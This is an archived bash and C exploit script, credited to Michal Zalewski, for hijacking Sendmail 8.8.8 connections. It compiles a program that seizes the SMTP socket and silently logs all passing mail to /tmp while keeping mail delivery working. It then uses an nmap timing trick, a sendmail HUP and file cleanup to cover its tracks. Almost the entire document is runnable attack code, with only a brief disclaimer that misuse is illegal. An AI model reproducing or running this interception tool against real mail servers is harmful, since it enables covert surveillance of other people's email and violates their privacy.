home *** CD-ROM | disk | FTP | other *** search
- #!/bin/bash
-
- #
- # Sendmail 8.8.8 mail hijacking
- # (c) Michal Zalewski <lcamtuf@ids.pl>
- # ------------------------------------
- # This exploit will hijack all Sendmail connections, loggin
- # mail traffic to some location (/tmp by default, change to
- # something more private). Normal MTA functionality is
- # preserved - you could call it 'transparent mail traffic sniffer'.
- #
- # NOTE: usage other than for diagnostic oreducational purposes
- # is simply *illegal* and villainy. Privacy is sanctity.
- #
-
- echo "---------------------------------------------"
- echo "Welcome to Sendmail 8.8.8 mail hijack exploit"
- echo "---------------------------------------------"
- echo
-
- echo "* Creating files in /tmp (hopefully no 'noexec' there)..."
-
- cd /tmp
- cat >test.c <<EOF
-
- #include <netinet/in.h>
- #include <fcntl.h>
- #include <signal.h>
- #include <errno.h>
-
- #define SERV_FD 4
- #define DIRECTORY "/tmp"
-
- main(int argc,char* argv[]) {
- int to_sm[2],from_sm[2],rd,fd,e1=0,e2=0;
- char buf[4096];
- struct sockaddr_in saddr;
- int csock,i=sizeof(saddr);
- if (strcmp("sendmail",argv[0])) execl(argv[0],"sendmail","-bd",0);
- signal(SIGCLD,SIG_IGN);
- while (1) {
- while ((csock=accept(SERV_FD,&saddr,&i))<0);
- if (!fork()) {
- sprintf(buf,DIRECTORY "/trans-%d-%d-in",time(0),getpid());
- fd=open(buf,O_WRONLY|O_TRUNC|O_CREAT,0600);
- pipe(to_sm);
- pipe(from_sm);
- if (!fork()) {
- dup2(to_sm[0],0);
- dup2(from_sm[1],1);
- dup2(from_sm[1],2);
- close(to_sm[1]);
- close(from_sm[0]);
- execl("/usr/sbin/sendmail","sendmail","-bs",0);
- exit(0);
- }
- close(to_sm[0]);
- close(from_sm[1]);
- while ((!e1 || (e1==EAGAIN)) && ((!e2 || e2==EAGAIN))) {
- fcntl(csock,F_SETFL,O_NONBLOCK);
- rd=read(csock,buf,sizeof(buf));
- if (rd>0) { write(to_sm[1],buf,rd); write(fd,buf,rd); }
- else if (rd) e1=errno; else e1=1; /* bab00m */
- fcntl(from_sm[0],F_SETFL,O_NONBLOCK);
- rd=read(from_sm[0],buf,sizeof(buf));
- if (rd>0) write(csock,buf,rd); else if (rd) e2=errno; else e2=1; /* kaboom */
- usleep(10000);
- }
- write(fd,"\nEOF\n",5);
- close(to_sm[1]);
- close(from_sm[0]);
- close(fd);
- shutdown(csock,2);
- close(csock);
- exit(0);
- }
- }
- }
- EOF
-
- echo "* Compiling takeover service..."
-
- gcc test.c -o test
-
- nmap -p 25 -sS -P0 -n 127.0.0.1 &>/dev/null
-
- echo
- echo "* Now, on your root box (could be your own machine), you have"
- echo " to execute following command (of course nmap is required, get"
- echo " it at www.insecure.org/nmap/). Then, you have just seconds"
- echo " to hit RETURN here, so the exploit could continue. Try to fit"
- echo " in less than 4 secs."
- echo
- echo " Command: nmap -p 25 -sS -P0 -n `hostname -i`"
- echo
- echo -n "Hit RETURN to continue... "
- read
- echo
-
- echo "* Ok, time's up... Hopefully you fit in 4 seconds..."
-
- doexec /usr/sbin/sendmail /tmp/test -bD &
-
- echo "* Wait a moment, takeover in progress..."
-
- sleep 2
- killall -HUP sendmail 2>/dev/null
- sleep 3
- rm -f /tmp/test /tmp/test.c
-
- echo "* Let's see what we have here... type some bogus commands"
- echo " and check for session transcript in choosen directory..."
- echo
-
- telnet 127.0.0.1 25
-
